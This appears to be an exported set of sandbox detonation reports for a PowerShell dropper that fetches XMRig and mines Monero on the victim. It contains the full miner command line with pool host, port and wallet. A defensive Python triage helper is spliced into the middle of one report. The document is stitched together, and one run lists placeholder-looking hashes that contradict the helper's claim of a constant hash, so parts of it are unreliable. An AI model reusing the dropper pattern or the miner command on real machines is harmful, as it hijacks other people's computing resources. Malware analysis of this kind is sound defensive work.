| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/1056-0-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_he5huove.y1p.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1056-9-0x0000026960040000-0x0000026960062000-memory.dmp
memory/1056-10-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp
memory/1056-11-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp
memory/1056-12-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp
memory/1056-13-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp
memory/1056-14-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:29
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 process-memory hits for the XMRig signature; per-hit fields are all N/A in this export | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4716 wrote to memory of 1356 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4716 wrote to memory of 1356 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
Files
memory/4716-0-0x00007FFA49D23000-0x00007FFA49D25000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l2ua1ydw.wyj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4716-10-0x0000021B7F4C0000-0x0000021B7F4E2000-memory.dmp
memory/4716-11-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp
memory/4716-12-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp
memory/4716-14-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp
memory/4716-15-0x0000021B7F490000-0x0000021B7F4A2000-memory.dmp
memory/4716-16-0x0000021B7DC50000-0x0000021B7DC5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1356-47-0x0000016FEE310000-0x0000016FEE330000-memory.dmp
memory/1356-48-0x0000016FEE360000-0x0000016FEE380000-memory.dmp
memory/1356-49-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/4716-50-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp
memory/1356-51-0x0000016FEE380000-0x0000016FEE3A0000-memory.dmp
memory/1356-53-0x0000016FEE3A0000-0x0000016FEE3C0000-memory.dmp
memory/4716-52-0x00007FFA49D23000-0x00007FFA49D25000-memory.dmp
memory/1356-54-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/4716-55-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp
memory/1356-56-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-58-0x0000016FEE380000-0x0000016FEE3A0000-memory.dmp
memory/1356-57-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-59-0x0000016FEE3A0000-0x0000016FEE3C0000-memory.dmp
memory/1356-{60..118}-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp (59 consecutive dumps of the same region of PID 1356, xmrig.exe)
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:30
Platform
win11-20240508-en
Max time kernel
1712s
Max time network
1722s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 52.111.227.11:443 | | tcp |
Files
memory/4836-0-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilqk5kpr.jbl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4836-9-0x0000021D45230000-0x0000021D45252000-memory.dmp
memory/4836-10-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp
memory/4836-11-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp
memory/4836-12-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp
memory/4836-13-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp
memory/4836-14-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:41
Platform
win7-20240221-en
Max time kernel
1562s
Max time network
1568s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
Files
memory/2956-4-0x000007FEF5D7E000-0x000007FEF5D7F000-memory.dmp
memory/2956-5-0x000000001B310000-0x000000001B5F2000-memory.dmp
memory/2956-6-0x0000000001DE0000-0x0000000001DE8000-memory.dmp
memory/2956-7-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
memory/2956-8-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
memory/2956-9-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
memory/2956-10-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
memory/2956-11-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
memory/2956-12-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:29
Platform
win10-20240404-en
Max time kernel
1796s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 process-memory hits for the XMRig signature; per-hit fields are all N/A in this export | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4732 wrote to memory of 4408 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4732 wrote to memory of 4408 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/4732-5-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp
memory/4732-4-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp
memory/4732-6-0x00000130E5380000-0x00000130E53A2000-memory.dmp
memory/4732-9-0x00000130FDAA0000-0x00000130FDB16000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uevzqsoh.brm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4732-24-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp
memory/4732-47-0x00000130FDA80000-0x00000130FDA92000-memory.dmp
memory/4732-60-0x00000130E53B0000-0x00000130E53BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4408-89-0x000002D89AAE0000-0x000002D89AB00000-memory.dmp
memory/4408-90-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-91-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4732-92-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp
memory/4732-93-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp
memory/4408-{94..146}-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp (53 consecutive dumps of the same region of PID 4408, xmrig.exe)
memory/4408-147-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-148-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-149-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-150-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-151-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-152-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-153-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-154-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:37
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5040 wrote to memory of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5040 wrote to memory of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
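Added example (not part of this sandbox report or of the sandbox vendor's tooling): a small Python triage helper that parses the two command lines and the pool row from the behavioral12 run above, recovers the miner's pool host, port and wallet, flags the `-ExecutionPolicy bypass -File <script in %TEMP%>` dropper pattern, and only reports the miner as live when the pool named on its command line is the destination the network table shows being contacted. The command lines and network rows are copied from this report as constructed sample input; the flag names (-o/--url, -u/--user, -p/--pass) are XMRig's documented options, and the wallet check uses the Monero primary-address shape (a '4' followed by 94 base58 characters).

```python
"""Triage helper for the process tree and network table of this report.

Added example, not part of the sandbox report or of any vendor tooling. The
sample command lines and network rows are copied from this report; the option
names are XMRig's own CLI flags and the address shape is Monero's primary
address format (a '4' followed by 94 base58 characters).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

MONERO_ADDRESS_RE = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# XMRig flags that take a value, either as the next argument or as --flag=value.
VALUE_FLAGS = {"-o", "--url", "-u", "--user", "-p", "--pass",
               "-a", "--algo", "--coin", "--donate-level"}

# Constructed sample input: the behavioral12 Processes and Network entries.
SAMPLE_COMMAND_LINES = [
    r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"',
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 '
    r'-u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF',
]
SAMPLE_NETWORK = [("149.102.143.109", 10128, "gulf.moneroocean.stream")]
# The behavioral24 run: the dropper ran, resolved github.com, and nothing else happened.
SAMPLE_FAILED_COMMAND_LINES = [
    r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"',
]
SAMPLE_FAILED_NETWORK = [("8.8.8.8", 53, "github.com")]


@dataclass
class DropperIndicators:
    image: str
    execution_policy_bypass: bool = False
    script_path: Optional[str] = None
    script_in_temp: bool = False


@dataclass
class MinerConfig:
    image: str
    pool_host: Optional[str] = None
    pool_port: Optional[int] = None
    wallet: Optional[str] = None
    wallet_is_monero: bool = False
    extra_flags: List[str] = field(default_factory=list)


def tokenize(cmd: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole.
    shlex is deliberately not used: its POSIX mode strips the backslashes."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def parse_pool(url: str) -> Tuple[str, Optional[int]]:
    """'host:port' or 'stratum+tcp://host:port' -> (host, port)."""
    hostport = url.rsplit("://", 1)[-1]
    host, sep, port = hostport.rpartition(":")
    if not sep or not port.isdigit():
        return hostport, None
    return host, int(port)


def parse_powershell_args(argv: List[str]) -> DropperIndicators:
    """Flag the two things the report shows: policy bypass and a script in %TEMP%."""
    ind = DropperIndicators(image=argv[0])
    for i, tok in enumerate(argv[1:], start=1):
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        low = tok.lower()
        # PowerShell accepts unambiguous prefixes, so -ep and -ex also mean -ExecutionPolicy.
        if low in ("-executionpolicy", "-ep", "-ex") and nxt.lower() in ("bypass", "unrestricted"):
            ind.execution_policy_bypass = True
        elif low in ("-file", "-f") and nxt:
            ind.script_path = nxt
            ind.script_in_temp = bool(TEMP_DIR_RE.search(nxt))
    return ind


def parse_xmrig_args(argv: List[str]) -> MinerConfig:
    """Recover pool and wallet from an XMRig-style argument vector."""
    cfg = MinerConfig(image=argv[0])
    i = 1
    while i < len(argv):
        name, has_eq, value = argv[i].partition("=")
        if name in VALUE_FLAGS and not has_eq:
            value = argv[i + 1] if i + 1 < len(argv) else ""
            i += 2
        else:
            i += 1
        if name in ("-o", "--url"):
            cfg.pool_host, cfg.pool_port = parse_pool(value)
        elif name in ("-u", "--user"):
            cfg.wallet = value
            cfg.wallet_is_monero = bool(MONERO_ADDRESS_RE.match(value))
        else:
            cfg.extra_flags.append(f"{name}={value}" if value else name)
    return cfg


def looks_like_miner(argv: List[str]) -> bool:
    """Do not trust the file name alone: a renamed xmrig still carries a wallet."""
    return "xmrig" in argv[0].lower() or any(MONERO_ADDRESS_RE.match(t) for t in argv[1:])


def analyze_run(command_lines: List[str], network_rows: List[Tuple[str, int, str]]) -> dict:
    """Correlate process tree and network table. 'pool_contacted' is only True when
    the pool on the miner's command line appears as a destination, which separates
    a live miner from a dropper whose download never completed."""
    report = {"dropper": None, "miner": None, "pool_contacted": False}
    for cmd in command_lines:
        argv = tokenize(cmd)
        if not argv:
            continue
        if argv[0].lower().endswith(("powershell.exe", "pwsh.exe")):
            report["dropper"] = parse_powershell_args(argv)
        elif looks_like_miner(argv):
            report["miner"] = parse_xmrig_args(argv)
    miner = report["miner"]
    if miner and miner.pool_host:
        report["pool_contacted"] = any(
            domain == miner.pool_host and port == miner.pool_port
            for _ip, port, domain in network_rows
        )
    return report


if __name__ == "__main__":
    print("behavioral12:", analyze_run(SAMPLE_COMMAND_LINES, SAMPLE_NETWORK))
    print("behavioral24:", analyze_run(SAMPLE_FAILED_COMMAND_LINES, SAMPLE_FAILED_NETWORK))
```

Run it directly to print both summaries. Two caveats the report itself supports: the `__PSScriptPolicyTest_*.ps1` files listed under Files (same hash in every run) are written by PowerShell at startup to probe AppLocker/WDAC script policy, not by the dropper, so they are deliberately not treated as indicators; and the behavioral24 and behavioral28 runs show only a github.com DNS lookup with no miner process, which is why the correlation step reports no live miner for them instead of alerting on the presence of powershell.exe alone.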
Files
memory/5040-0-0x00007FFFE77F3000-0x00007FFFE77F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_urs2oi5d.dqc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5040-9-0x000002696F350000-0x000002696F372000-memory.dmp
memory/5040-10-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp
memory/5040-11-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp
memory/5040-12-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp
memory/5040-14-0x000002696F3C0000-0x000002696F3D2000-memory.dmp
memory/5040-15-0x000002696F340000-0x000002696F34A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1820-46-0x0000028734E80000-0x0000028734EA0000-memory.dmp
memory/1820-47-0x00000287365F0000-0x0000028736610000-memory.dmp
memory/1820-48-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-50-0x0000028736610000-0x0000028736630000-memory.dmp
memory/1820-51-0x0000028736630000-0x0000028736650000-memory.dmp
memory/5040-49-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp
memory/5040-53-0x00007FFFE77F3000-0x00007FFFE77F5000-memory.dmp
memory/1820-52-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-54-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-55-0x00007FF732B10000-0x00007FF733743000-memory.dmp
